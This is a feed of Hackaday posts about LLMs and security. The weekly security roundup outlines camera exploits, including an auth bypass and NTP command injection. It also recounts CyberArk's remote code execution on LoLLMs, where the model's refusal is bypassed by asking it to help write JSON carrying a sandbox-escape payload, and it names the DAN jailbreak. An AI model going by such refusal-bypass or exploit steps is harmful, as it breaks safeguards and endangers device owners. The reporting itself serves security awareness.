LLM – Hackaday https://hackaday.com Fresh hacks every day Tue, 05 Nov 2024 06:23:31 +0000 en-US hourly 1 https://wordpress.org/?v=6.6.2 156670177 This Week in Security: Playing Tag, Hacking Cameras, and More https://hackaday.com/2024/11/01/this-week-in-security-playing-tag-hacking-cameras-and-more/ https://hackaday.com/2024/11/01/this-week-in-security-playing-tag-hacking-cameras-and-more/#comments Fri, 01 Nov 2024 14:00:29 +0000 https://hackaday.com/?p=730990&preview=true&preview_id=730990 Wired has a fascinating story this week, about the length Sophos has gone to for the last 5 years, to track down a group of malicious but clever security researchers …read more]]>

Wired has a fascinating story this week, about the length Sophos has gone to for the last 5 years, to track down a group of malicious but clever security researchers that were continually discovering vulnerabilities and then using those findings to attack real-world targets. Sophos believes this adversary to be overlapping Chinese groups known as APT31, APT41, and Volt Typhoon.

The story is actually refreshing in its honesty, with Sophos freely admitting that their products, and security products from multiple other vendors have been caught in the crosshairs of these attacks. And indeed, we’ve covered stories about these vulnerabilities over the past weeks and months right here on this column. The sneaky truth is that many of these security products actually have pretty severe security problems.

The issues at Sophos started with an infection of an informational computer at a subsidiary office. They believe this was an information gathering exercise, that was a precursor to the widespread campaign. That campaign used multiple 0-days to crack “tens of thousands of firewalls around the world”. Sophos rolled out fixes for those 0-days, and included just a bit of extra logging as an undocumented feature. That logging paid off, as Sophos’ team of researchers soon identified an early signal among the telemetry. This wasn’t merely the first device to be attacked, but was actually a test device used to develop the attack. The game was on.

Sophos managed to deploy it’s own spyware to these test devices, to stealthily keep an eye on this clever opponent. This even thwarted a later attack before it could really start. Among the interesting observations was a bootkit infection on one of these firewalls. This wasn’t ever found in the wild, but the very nature of such an attack makes it hard to discover.

There’s one more interesting wrinkle to this story. In at least one case, Sophos received the 0-day vulnerability used in an attack through their bug bounty program, right after the wave of attacks was launched. The timing, combined with the Chinese IP Address makes it pretty clear this was more than a coincidence. This might be a Chinese hacker making a bit of extra cash on the side. It’s also reminiscent of the Chinese law requiring companies to disclose vulnerabilities to the Chinese government.

PTA 0-Day

GreyNoise runs a honeypot and an AI threat detection system, and found something interesting with that combination. The PTZOptics network security camera was the intended target, and there were a pair of vulnerabilities that this attack was intended to exploit. The first is a simple authorization bypass, where sending HTTP packets without an authorization header to the param.cgi endpoint returns data without any authorization needed. Use the get_system_conf parameter, and the system helpfully prints out valid username and password hashes. How convenient.

Gaining arbitrary command execution is trivial, as the ntp configuration isn’t properly sanitized, and the ntp binary is called insecurely. A simple $(cmd) can be injected for easy execution. Those two were being chained together for a dead simple attack chain, presumably to add the IoT devices to a botnet. The flaws have been fixed, and law enforcement have been on the case, at least seizing the IP address observed in the attacks.

Speaking of camera hacks, we do have an impressive tale from Pwn2Own 2024, where researchers at Synacktiv used a format string vulnerability to pwn the Synology TC500 camera. The firmware in question had a whole alphabet of security features, like ASLR, PIE, NX, and Full RelRO. That’s Address Space Layout Randomization, Position Independent Executables, Non-Executable memory, and Full Relocation Read-Only protections. Oh, and the payload was limited to 128 characters, with the first 32 ASCII characters unavailable for use.

How exactly does one write an exploit in this case? A bit of a lucky break with the existing memory layout gave access to what the write-up calls a “looping pointer”. That seems to be a pointer that points to itself, which is quite useful to work from offsets instead of precise memory locations. The vulnerability allowed for writing a shell command into unused memory. Then finally a bit of Return Oriented Programming, a ROP gadget, manages to launch a system call on the saved command line. Impressive.

Maybe It Wasn’t a Great Idea

…to give LLMs code execution capabilities. That’s the conclusion we came to after reading CyberArk’s post on how to achieve Remote Code Execution on a Large Language Model. The trick here is that this particular example, LoLLMs, can run python code on the backend to perform certain tasks, like do math calculations. This implementation uses Python sandboxing, and naturally there’s a known way to defeat it. The trick can be pulled off just by getting the model to evaluate the right JSON snippet, but it’s smart enough to realize that something is off and refuse to evaluate the JSON.

The interesting detail here is that it is the LLM itself that is refusing, so it’s the LLM that needs bypassed. There has been very interesting work done on LLM jailbreaks, like DAN, the Do Anything Now prompt. That would probably have worked, but this exploit can be even sneakier than that. Simply ask the LLM to help you write some JSON. Specify the payload, and ask it to add something to it. It gladly complies, and code is executed. Who knew that LLMs were so gullible?

More Quantum Erratta

This story just keeps on giving. This time it’s [Dan Goodin] at Ars Technica that has the lowdown, filling in the last few missing details about the much over-hyped quantum computing breakthrough. One of the first of those details is that the story of the compromise of AES was published in the South China Morning Post, which has over-hyped Chinese quantum progress before. What [Goodin]’s article really adds to the discussion is opinions from experts. The important takeaway is that the performance of the D-Wave quantum computer is comparable to classical approaches.

Bits and Bytes

Remember the traffic light hacking? And part two? We now have the third installment, which is really all about you, too, can purchase and hack on one of these traffic controllers. It may or may not surprise you that the answer is to buy them on Ebay and cobble together a makeshift power supply.

It’s amazing how often printers, point of sale, and other IoT gadgets are just running stripped-down, ancient versions of Android. This point of sale system is no exception, running an old, custom Android 6 system, that seems to actually be rather well locked down. Except that it has an NFC reader, and you can program NFC tags to launch Android apps. Use this creative workaround to get into Android settings, and you’re in business.

I have long maintained that printers are terrible. That sentiment apparently is extending into security research on printers, with Lexmark moving to a new encrypted filesystem for printer firmware. Thankfully, like most of these schemes, it’s not foolproof, and [Peter] has the scoop on getting in. May you never need it. Because seriously, printers are the worst.

]]>
https://hackaday.com/2024/11/01/this-week-in-security-playing-tag-hacking-cameras-and-more/feed/ 3 730990 DarkArts
All System Prompts for Anthropic’s Claude, Revealed https://hackaday.com/2024/10/12/all-system-prompts-for-anthropics-claude-revealed/ https://hackaday.com/2024/10/12/all-system-prompts-for-anthropics-claude-revealed/#comments Sun, 13 Oct 2024 05:00:10 +0000 https://hackaday.com/?p=727558 For as long as AI Large Language Models have been around (well, for as long as modern ones have been accessible online, anyway) people have tried to coax the models …read more]]>

For as long as AI Large Language Models have been around (well, for as long as modern ones have been accessible online, anyway) people have tried to coax the models into revealing their system prompts. The system prompt is essentially the model’s fundamental directives on what it should do and how it should act. Such healthy curiosity is rarely welcomed, however, and creative efforts at making a model cough up its instructions is frequently met with a figurative glare and stern tapping of the Terms & Conditions sign.

Anthropic have bucked this trend by making system prompts public for the web and mobile interfaces of all three incarnations of Claude. The prompt for Claude Opus (their flagship model) is well over 1500 words long, with different sections specifically for handling text and images. The prompt does things like help ensure Claude communicates in a useful way, taking into account the current date and an awareness of its knowledge cut-off, or the date after which Claude has no knowledge of events. There’s some stylistic stuff in there as well, such as Claude being specifically told to avoid obsequious-sounding filler affirmations, like starting a response with any form of the word “Certainly.”

While the source code (and more importantly, the training data and resulting model weights) for Claude remain under wraps, Anthropic have been rather more forthcoming than others when it comes to sharing other details about inner workings, showing how human-interpretable features and concepts can be extracted from LLMs (which uses Claude Sonnet as an example).

Naturally, safety is a concern with LLMs, which is as good an opportunity as any to remind everyone of Goody-2, undoubtedly the world’s safest AI.

]]>
https://hackaday.com/2024/10/12/all-system-prompts-for-anthropics-claude-revealed/feed/ 5 727558 LargeLanguageModel
Large Language Models on Small Computers https://hackaday.com/2024/09/07/large-language-models-on-small-computers/ https://hackaday.com/2024/09/07/large-language-models-on-small-computers/#comments Sat, 07 Sep 2024 08:00:35 +0000 https://hackaday.com/?p=705861 As technology progresses, we generally expect processing capabilities to scale up. Every year, we get more processor power, faster speeds, greater memory, and lower cost. However, we can also use …read more]]>

As technology progresses, we generally expect processing capabilities to scale up. Every year, we get more processor power, faster speeds, greater memory, and lower cost. However, we can also use improvements in software to get things running on what might otherwise be considered inadequate hardware. Taking this to the extreme, while large language models (LLMs) like GPT are running out of data to train on and having difficulty scaling up, [DaveBben] is experimenting with scaling down instead, running an LLM on the smallest computer that could reasonably run one.

Of course, some concessions have to be made to get an LLM running on underpowered hardware. In this case, the computer of choice is an ESP32, so the dataset was reduced from the trillions of parameters of something like GPT-4 or even hundreds of billions for GPT-3 down to only 260,000. The dataset comes from the tinyllamas checkpoint, and llama.2c is the implementation that [DaveBben] chose for this setup, as it can be streamlined to run a bit better on something like the ESP32. The specific model is the ESP32-S3FH4R2, which was chosen for its large amount of RAM compared to other versions since even this small model needs a minimum of 1 MB to run. It also has two cores, which will both work as hard as possible under (relatively) heavy loads like these, and the clock speed of the CPU can be maxed out at around 240 MHz.

Admittedly, [DaveBben] is mostly doing this just to see if it can be done since even the most powerful of ESP32 processors won’t be able to do much useful work with a large language model. It does turn out to be possible, though, and somewhat impressive, considering the ESP32 has about as much processing capability as a 486 or maybe an early Pentium chip, to put things in perspective. If you’re willing to devote a few more resources to an LLM, though, you can self-host it and use it in much the same way as an online model such as ChatGPT.

]]>
https://hackaday.com/2024/09/07/large-language-models-on-small-computers/feed/ 6 705861 esp32-llm-main
Hackaday Links: September 1, 2024 https://hackaday.com/2024/09/01/hackaday-links-september-1-2024/ https://hackaday.com/2024/09/01/hackaday-links-september-1-2024/#comments Sun, 01 Sep 2024 23:00:08 +0000 https://hackaday.com/?p=702246&preview=true&preview_id=702246 Hackaday Links Column BannerWhy is it always a helium leak? It seems whenever there’s a scrubbed launch or a narrowly averted disaster, space exploration just can’t get past the problems of helium plumbing. …read more]]> Hackaday Links Column Banner

Why is it always a helium leak? It seems whenever there’s a scrubbed launch or a narrowly averted disaster, space exploration just can’t get past the problems of helium plumbing. We’ve had a bunch of helium problems lately, most famously with the leaks in Starliner’s thruster system that have prevented astronauts Butch Wilmore and Suni Williams from returning to Earth in the spacecraft, leaving them on an extended mission to the ISS. Ironically, the launch itself was troubled by a helium leak before the rocket ever left the ground. More recently, the Polaris Dawn mission, which is supposed to feature the first spacewalk by a private crew, was scrubbed by SpaceX due to a helium leak on the launch tower. And to round out the helium woes, we now have news that the Peregrine mission, which was supposed to carry the first commercial lander to the lunar surface but instead ended up burning up in the atmosphere and crashing into the Pacific, failed due to — you guessed it — a helium leak.

Thankfully, there’s a bit more technical detail on that last one; it seems that a helium pressure control valve, designated PCV2 and controlling helium to pressurize an oxidizer tank, got stuck open thanks to “vibration-induced relaxation” in threaded components within the valve. So, launch vibrations shook a screw loose inside the valve, which kept it from sealing and over-pressurized an oxidizer tank with helium to the point of tank failure — kablooie, end of mission. All of these failures are just another way of saying that space travel is really, really hard, of course. But still, with helium woes figuring so prominently in so many failures, we’re left wondering if there might not be an upside to finding something else to pressurize tanks.

Back on terra firma, we got a tip from a reader going by the name of [Walrus] who is alarmed by an apparent trend in the electronics testing market toward a subscription model for the software needed to run modern test gear. Specifically, the tip included a link to a reseller offering a deal on an “Ultimate Software Bundle” for Tektronix 4 Series Mixed-Signal Oscilloscopes. The offer expired at the end of 2023 and prices aren’t mentioned, but given that a discount of up to $5,670 with purchase of a scope was advertised, we’d imagine the Ultimate Software Bundle comes at a pretty steep price. The chief concern [Walrus] expressed was about the possibility that used instruments whose software is tied to a subscription may have little to no value in the secondary market, where many up-and-coming engineers shop for affordable gear. We haven’t had any personal experience with subscription models for test equipment software, and a quick read of the Tektronix site seems to suggest that subscriptions are only one of the models available for licensing instrument software. Still, the world seems to be moving to one where everything costs something forever, and that the days of a “one and done” purchase are going away. We’d love to hear your thoughts on subscription software for test gear, especially if we’ve misread the situation with Tek. Sound off in the comments below.

In this week’s edition of “Dystopia Watch,” we’re alarmed by a story about how police departments are experimenting with generative AI to assist officers in report writing. The product, called Draft One, is from Axon, a public safety technology concern best known for its body-worn cameras and tasers. Using Azure OpenAI, Draft One transcribes the audio from body cam footage and generates a “draft narrative” of an officer’s interaction with the public. The draft is then reviewed by the officer, presumably corrected if needed, and sent on to a second reviewer before becoming the official report. Axon reports that it had to adjust the LLM’s settings to keep AI hallucinations from becoming part of the narrative. While we can see how this would be a huge benefit to officers, who generally loathe everything about report writing, and would get them back out on patrol rather than sitting in a parking lot tapping at a keyboard, we can also see how this could go completely sideways in a hurry. All it will take is one moderately competent defense attorney getting an officer to admit under oath that the words of the report were not written by him or her, and this whole thing goes away.

And finally, getting three (or more) monitors to all agree on what white is can be quite a chore, and not just a little enraging for the slightly obsessive-compulsive — it’s one of the reasons we favor dark mode so much, to be honest. Luckily, if you need a screen full of nothing but #FFFFFF pixels so you can adjust color balance in your multi-monitor setup, it’s as easy as calling up a web page. The White Screen Tool does one thing — paints all the pixels on the screen whatever color you want. If you need all white, it’s just a click away — no need to start up MS Paint or GIMP and futz around with making it bezel-to-bezel. There are plenty of other presets, if white isn’t your thing, plus a couple of fun animated screens that imitate Windows update screens — let the office hijinks begin! You can also set custom colors, which is nice; might we suggest #1A1A1A and #F3BF10?

]]>
https://hackaday.com/2024/09/01/hackaday-links-september-1-2024/feed/ 21 702246 Hackaday Links
Peering Into The Black Box of Large Language Models https://hackaday.com/2024/07/03/peering-into-the-black-box-of-large-language-models/ https://hackaday.com/2024/07/03/peering-into-the-black-box-of-large-language-models/#comments Wed, 03 Jul 2024 14:00:50 +0000 https://hackaday.com/?p=692641 Large Language Models (LLMs) can produce extremely human-like communication, but their inner workings are something of a mystery. Not a mystery in the sense that we don’t know how an …read more]]>

Large Language Models (LLMs) can produce extremely human-like communication, but their inner workings are something of a mystery. Not a mystery in the sense that we don’t know how an LLM works, but a mystery in the sense that the exact process of turning a particular input into a particular output is something of a black box.

This “black box” trait is common to neural networks in general, and LLMs are very deep neural networks. It is not really possible to explain precisely why a specific input produces a particular output, and not something else.

Why? Because neural networks are neither databases, nor lookup tables. In a neural network, discrete activation of neurons cannot be meaningfully mapped to specific concepts or words. The connections are complex, numerous, and multidimensional to the point that trying to tease out their relationships in any straightforward way simply does not make sense.

Neural Networks are a Black Box

In a way, this shouldn’t be surprising. After all, the entire umbrella of “AI” is about using software to solve the sorts of problems humans are in general not good at figuring out how to write a program to solve. It’s maybe no wonder that the end product has some level of inscrutability.

This isn’t what most of us expect from software, but as humans we can relate to the black box aspect more than we might realize. Take, for example, the process of elegantly translating a phrase from one language to another.

I’d like to use as an example of this an idea from an article by Lance Fortnow in Quanta magazine about the ubiquity of computation in our world. Lance asks us to imagine a woman named Sophie who grew up speaking French and English and works as a translator. Sophie can easily take any English text and produce a sentence of equivalent meaning in French. Sophie’s brain follows some kind of process to perform this conversion, but Sophie likely doesn’t understand the entire process. She might not even think of it as a process at all. It’s something that just happens. Sophie, like most of us, is intimately familiar with black box functionality.

The difference is that while many of us (perhaps grudgingly) accept this aspect of our own existence, we are understandably dissatisfied with it as a feature of our software. New research has made progress towards changing this.

Identifying Conceptual Features in Language Models

We know perfectly well how LLMs work, but that doesn’t help us pick apart individual transactions. Opening the black box while it’s working yields only a mess of discrete neural activations that cannot be meaningfully mapped to particular concepts, words, or whatever else. Until now, that is.

A small sample of features activated when an LLM is prompted with questions such as “What is it like to be you?” and “What’s going on in your head?” (source: Extracting Interpretable Features from Claude 3 Sonnet)

Recent developments have made the black box much less opaque, thanks to tools that can map and visualize LLM internal states during computation. This creates a conceptual snapshot of what the LLM is — for lack of a better term — thinking in the process of putting together its response to a prompt.

Anthropic have recently shared details on their success in mapping the mind of their Claude 3.0 Sonnet model by finding a way to match patterns of neuron activations to concrete, human-understandable concepts called features.

A feature can be just about anything; a person, a place, an object, or more abstract things like the idea of upper case, or function calls. The existence of a feature being activated does not mean it factors directly into the output, but it does mean it played some role in the road the output took.

With a way to map groups of activations to features — a significant engineering challenge — one can meaningfully interpret the contents of the black box. It is also possible to measure a sort of relational “distance” between features, and therefore get an even better idea of what a given state of neural activation represents in conceptual terms.

Making Sense of it all

One way this can be used is to produce a heat map that highlights how heavily different features were involved in Claude’s responses. Artificially manipulating the weighting of different concepts changes Claude’s responses in predictable ways (video), demonstrating that the features are indeed reasonably accurate representations of the LLM’s internal state. More details on this process are available in the paper Scaling Monosemanticity: Extracting Interpretable Features from Claude 3 Sonnet.

Mapping the mind of a state-of-the-art LLM like Claude may be a nontrivial undertaking, but that doesn’t mean the process is entirely the domain of tech companies with loads of resources. Inspectus by [labml.ai] is a visualization tool that works similarly to provide insight into the behavior of LLMs during processing. There is a tutorial on using it with a GPT-2 model, but don’t let that turn you off. GPT-2 may be older, but it is still relevant.

Research like this offers new ways to understand (and potentially manipulate, or fine-tune) these powerful tools., making LLMs more transparent and more useful, especially in applications where lack of operational clarity is hard to accept.

]]>
https://hackaday.com/2024/07/03/peering-into-the-black-box-of-large-language-models/feed/ 34 692641 LargeLanguageModel
Torment Poor Milton With Your Best Pixel Art https://hackaday.com/2024/06/25/torment-poor-milton-with-your-best-pixel-art/ https://hackaday.com/2024/06/25/torment-poor-milton-with-your-best-pixel-art/#comments Tue, 25 Jun 2024 15:30:41 +0000 https://hackaday.com/?p=692667 One of the great things about new tech tools is just having fun with them, like embracing your inner trickster god to mess with ‘Milton’, an AI trapped in an …read more]]>

One of the great things about new tech tools is just having fun with them, like embracing your inner trickster god to mess with ‘Milton’, an AI trapped in an empty room.

Milton is trapped in a room is a pixel-art game with a simple premise: use a basic paint interface to add objects to the room, then watch and listen to Milton respond to them. That’s it? That’s it. The code is available on the GitHub repository, but there’s also a link to play it live without any kind of signup or anything. Give it a try if you have a few spare minutes.

Under the hood, the basic loop is to let the user add something to the room, send the picture of the room (with its new contents) off for image recognition, then get Milton’s reaction to it. Milton is equal parts annoyed and jumpy, and his speech and reactions reflect this.

The game is a bit of a concept demo for Open Souls whose “thing” is providing AIs with far more personality and relatable behaviors than one typically expects from large language models. Maybe this is just what’s needed for AI opponents in things like the putting game of Connect Fore! to level up their trash talking.

]]>
https://hackaday.com/2024/06/25/torment-poor-milton-with-your-best-pixel-art/feed/ 7 692667 milton
NetBSD Bans AI-Generated Code From Commits https://hackaday.com/2024/05/18/netbsd-bans-ai-generated-code-from-commits/ https://hackaday.com/2024/05/18/netbsd-bans-ai-generated-code-from-commits/#comments Sat, 18 May 2024 08:00:06 +0000 https://hackaday.com/?p=678125 A recent change was announced to the NetBSD commit guidelines which amends these to state that code which was generated by Large Language Models (LLMs) or similar technologies, such as …read more]]>

A recent change was announced to the NetBSD commit guidelines which amends these to state that code which was generated by Large Language Models (LLMs) or similar technologies, such as ChatGPT, Microsoft’s Copilot or Meta’s Code Llama is presumed to be tainted code. This amendment was to the existing section about tainted code, which originally referred to any code that was not written directly by the person committing the code, and was due to licensing concerns. The obvious reason behind this is that otherwise code may be copied into the NetBSD codebase which may have been licensed under an incompatible (or proprietary) license.

In the case of LLM-based code generators like the above-mentioned, the problem stems from the fact that they are trained on millions of lines of code from all over the internet, which are naturally released under a wide variety of licenses. Invariably, some of that code will be covered by a license that’s not acceptable for the NetBSD codebase. Although the guideline mentions that these auto-generated code commits may still be admissible, they require written permission from core developers, and presumably an in-depth audit of the code’s heritage. This should leave non-trivial commits that got churned out by ChatGPT and kin out in the cold.

The debate about the validity of works produced by current-gen “artificial intelligence” software is only just beginning, but there’s little question that NetBSD has made the right call here. From a legal and software engineering perspective this policy makes perfect sense, as LLM-generated code simply doesn’t meet the project’s standards. That said, code produced by humans brings with it a whole different set of potential problems.

]]>
https://hackaday.com/2024/05/18/netbsd-bans-ai-generated-code-from-commits/feed/ 38 678125 GithubCopilot